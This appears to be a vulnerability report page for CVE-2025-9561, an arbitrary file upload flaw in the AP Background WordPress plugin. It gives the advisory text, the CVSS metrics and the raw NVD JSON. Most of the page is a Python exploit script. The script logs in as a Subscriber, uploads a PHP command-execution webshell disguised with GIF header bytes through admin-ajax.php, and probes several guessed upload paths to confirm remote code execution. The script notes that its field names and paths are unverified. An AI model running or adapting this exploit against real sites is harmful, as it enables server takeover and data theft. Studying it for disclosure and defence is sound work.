Security Vulnerability Report
CVE-2025-9561 CVSS 8.8 HIGH

CVE-2025-9561

Published: 2025-10-03 12:15:48
Last Modified: 2026-04-15 00:35:42

Description

The AP Background plugin for WordPress is vulnerable to arbitrary file uploads due to missing authorization and insufficient file validation within the advParallaxBackAdminSaveSlider() handler in versions 3.8.1 to 3.8.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is published for this entry (the raw JSON below has no "configurations" block); the affected versions listed here are taken from the description.

WordPress AP Background Plugin 3.8.1
WordPress AP Background Plugin 3.8.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Note that the AJAX field names and the candidate upload paths used by the script are assumptions, not taken from the plugin source; verify them against the handler in includes/functions.admin.php (the NVD reference) before relying on the script, and remove any dropped file from the target once the finding is documented.
python
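# CVE-2025-9561 - WordPress AP Background Plugin Arbitrary File Upload PoC
# Vulnerability: Missing authorization + insufficient file validation in
#                advParallaxBackAdminSaveSlider()
# Affected versions: 3.8.1 - 3.8.2
#
# Authorized testing only.  The multipart field names and the candidate
# upload locations below are NOT taken from the plugin source; they are
# assumptions that must be confirmed against includes/functions.admin.php
# (the NVD reference) before trusting a negative result from this script.
import argparse
import sys

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "subscriber_user"
PASSWORD = "subscriber_password"

# Upper bound (seconds) for every outbound request so a stalled target
# cannot hang the script.
REQUEST_TIMEOUT = 15

# Minimal command-execution webshell.  The GIF89a magic is prepended because
# upload filters that only sniff the leading bytes will classify the file as
# an image; the .php extension still makes the server execute it.
PHP_PAYLOAD = b"<?php if(isset($_GET['cmd'])){system($_GET['cmd']);} ?>"
GIF_HEADER = b"GIF89a"

# AJAX action named in the advisory; presumably reachable through
# admin-ajax.php by any logged-in user -- confirm in the handler.
AJAX_ACTION = "advParallaxBackAdminSaveSlider"

# Candidate locations of the dropped file.  Unverified guesses at where the
# plugin stores slider images; a miss on all of them is not proof of safety.
UPLOAD_PATHS = (
    "/wp-content/uploads/ap-background/sliders/shell.php",
    "/wp-content/uploads/shell.php",
    "/wp-content/plugins/ap-background/uploads/shell.php",
)


def build_malicious_file(payload: bytes = PHP_PAYLOAD) -> bytes:
    """Return ``payload`` prefixed with GIF magic bytes.

    Args:
        payload: PHP source to embed; defaults to ``PHP_PAYLOAD``.

    Returns:
        The bytes to upload as ``shell.php``.
    """
    return GIF_HEADER + payload


def candidate_rce_urls(target_url: str, paths: tuple = UPLOAD_PATHS) -> list:
    """Return the URLs to probe for the dropped shell, each invoking ``id``.

    Args:
        target_url: Base URL of the WordPress site (trailing slash tolerated).
        paths: Site-relative paths to try, in order.
    """
    base = target_url.rstrip("/")
    return [f"{base}{path}?cmd=id" for path in paths]


def is_logged_in(session) -> bool:
    """Return True when ``session`` holds a WordPress logged-in cookie.

    WordPress only issues a ``wordpress_logged_in_*`` cookie after a
    successful authentication, which is a more reliable signal than the
    redirect URL or page text (both vary by theme, role and plugins).
    """
    return any(name.startswith("wordpress_logged_in_") for name in session.cookies.keys())


def login(session, target_url: str, username: str, password: str) -> bool:
    """Authenticate ``session`` via wp-login.php.

    Returns:
        True when the login cookie was issued, False otherwise.
    """
    # The initial GET lets the server set the test cookie that the login
    # form expects to see on the subsequent POST.
    session.get(f"{target_url}/wp-login.php", timeout=REQUEST_TIMEOUT)
    login_data = {
        "log": username,
        "pwd": password,
        "wp-submit": "Log In",
        "redirect_to": f"{target_url}/wp-admin/",
        "testcookie": "1",
    }
    session.post(f"{target_url}/wp-login.php", data=login_data, timeout=REQUEST_TIMEOUT)
    return is_logged_in(session)


def upload_shell(session, target_url: str) -> str:
    """POST the disguised PHP file through the vulnerable AJAX action.

    Returns:
        The raw response body, for the operator to inspect.
    """
    files = {
        # Field name is an assumption -- confirm against the handler.
        "slider_image": ("shell.php", build_malicious_file(), "image/gif"),
    }
    data = {
        "action": AJAX_ACTION,
        "slider_title": "exploit_slider",
    }
    response = session.post(
        f"{target_url}/wp-admin/admin-ajax.php",
        files=files,
        data=data,
        timeout=REQUEST_TIMEOUT,
    )
    return response.text


def find_rce(session, target_url: str):
    """Probe each candidate path; return the first URL that executed ``id``.

    Returns:
        The confirmed URL, or None when no candidate returned ``uid=``.
    """
    for rce_url in candidate_rce_urls(target_url):
        rce_response = session.get(rce_url, timeout=REQUEST_TIMEOUT)
        if rce_response.status_code == 200 and "uid=" in rce_response.text:
            print(f"[+] RCE confirmed at: {rce_url}")
            print(f"[+] Output: {rce_response.text}")
            return rce_url
        # Report every miss individually (a for/else only fires once, after
        # the loop, and would name only the last path).
        print(f"[-] Tried {rce_url} - no command output")
    return None


def main(argv=None) -> int:
    """Run the PoC end to end; returns a process exit code."""
    # Third-party dependency kept function-local so the pure helpers above
    # remain importable (and testable) without it installed.
    import requests

    parser = argparse.ArgumentParser(
        description="CVE-2025-9561 PoC (authorized testing only)"
    )
    parser.add_argument("--target", default=TARGET_URL, help="Base URL of the WordPress site")
    parser.add_argument("--user", default=USERNAME, help="Subscriber-level username")
    parser.add_argument("--password", default=PASSWORD, help="Password for --user")
    args = parser.parse_args(argv)
    target_url = args.target.rstrip("/")

    # Step 1: authenticate as a Subscriber-level user.
    session = requests.Session()
    if not login(session, target_url, args.user, args.password):
        print("[-] Login failed")
        return 1
    print("[+] Successfully logged in as Subscriber")

    # Steps 2-3: build the disguised file and push it through the handler.
    print(f"[+] Upload response: {upload_shell(session, target_url)}")

    # Step 4: locate the dropped file and confirm execution.
    if find_rce(session, target_url) is None:
        print("[-] Shell not found at any candidate path; check the plugin's real upload directory")
        return 1
    # Remember to delete shell.php from the target once the finding is documented.
    return 0


if __name__ == "__main__":
    sys.exit(main())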

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-9561", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:48.477", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The AP Background plugin for WordPress is vulnerable to arbitrary file uploads due to missing authorization and insufficient file validation within the advParallaxBackAdminSaveSlider() handler in versions 3.8.1 to 3.8.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/ap-background/tags/3.8.2/includes/functions.admin.php", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/ap-background/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e4045a2b-2bbc-4335-b6d2-af7a046f1f92?source=cve", "source": "[email protected]"}]}}